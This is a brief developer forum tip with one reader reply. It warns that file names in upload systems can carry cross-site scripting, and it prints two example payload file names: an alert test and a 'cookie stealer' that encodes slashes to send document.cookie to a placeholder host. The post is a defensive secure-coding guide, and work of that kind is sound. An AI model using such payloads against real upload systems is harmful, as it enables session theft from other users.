abwgaa
Last Updated: February 25, 2016
·
1.565K
· nmalcolm
 body onload alert 1

Web Security: File Names

One important thing to remember when it comes to developing web applications is you can never trust any of your users in any case. Humans are cruel; it's not unlikely someone will try to crawl their way in to your server or database.

When developing attachment, file upload, or similar systems, always remember to sanitize the file name.

Of course modern computer systems don't allow slashes in the file name so the following wouldn't work:

<body>hacked</body>.txt

Systems just don't like that. You cannot use slashes in file names. But a specially crafted file can be uploaded which could be used to steal cookies, redirect users, or modify the current page to the attacker's liking.

Examples:

// Simple alert
<body onload=alert(Hacked)>.txt

// Cookie stealer
<body onload=location.href="http:"+String.fromCharCode(47)+String.fromCharCode(47)+"localhost"+String.fromCharCode(47)+"test.php?data="+escape(document.cookie)>.txt

// etc

<em>ALWAYS</em> sanitize the file name. Keep yourself and your users safe. :)

Say Thanks
Respond

1 Response
Add your response

516
D71237bbbef89c1f13577060bab556f6

I Couldn't agree more with you, I wish I had mentioned this in my Pro Tip about sanitizing variables.

The only one thing I can add is HOW:

a) htmlspecialchars()
b) striptags()

c) stripslashes() / addslashes()
d) mysql
realescapestring()
e) htmlentities()
And to be honest, hundreds of more methods of sanitizing data.

Awesome post.

over 1 year ago ·